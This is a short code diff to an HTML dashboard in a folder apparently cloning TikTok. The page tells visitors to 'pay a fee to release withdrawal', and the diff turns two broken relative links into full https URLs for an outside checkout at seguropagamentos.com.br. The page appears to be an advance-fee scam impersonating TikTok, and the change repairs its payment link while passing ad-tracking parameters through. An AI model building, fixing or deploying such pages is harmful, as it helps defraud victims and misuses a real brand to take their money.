--- a/ttk clone 2-/dashboard/index.html
+++ b/ttk clone 2-/dashboard/index.html
@@ -705,7 +705,7 @@
         <!-- Call to Action -->
         <!-- Call to Action -->
         <div class="confirmation-section">
-          <a href="seguropagamentos.com.br/tiktokpag" class="confirmation-cta-button" id="confirmation-link">
+          <a href="https://www.seguropagamentos.com.br/tiktokpag" class="confirmation-cta-button" id="confirmation-link">
             Pagar taxa para Liberar Saque
           </a>
         </div>
@@ -713,7 +713,7 @@
         <script>
           (function () {
             // URL base do checkout
-            var baseUrl = 'seguropagamentos.com.br/tiktokpag';
+            var baseUrl = 'https://www.seguropagamentos.com.br/tiktokpag';
 
             // Pega a query inteira da URL atual (?utm_source=...&ttclid=...)
             var queryString = window.location.search || '';
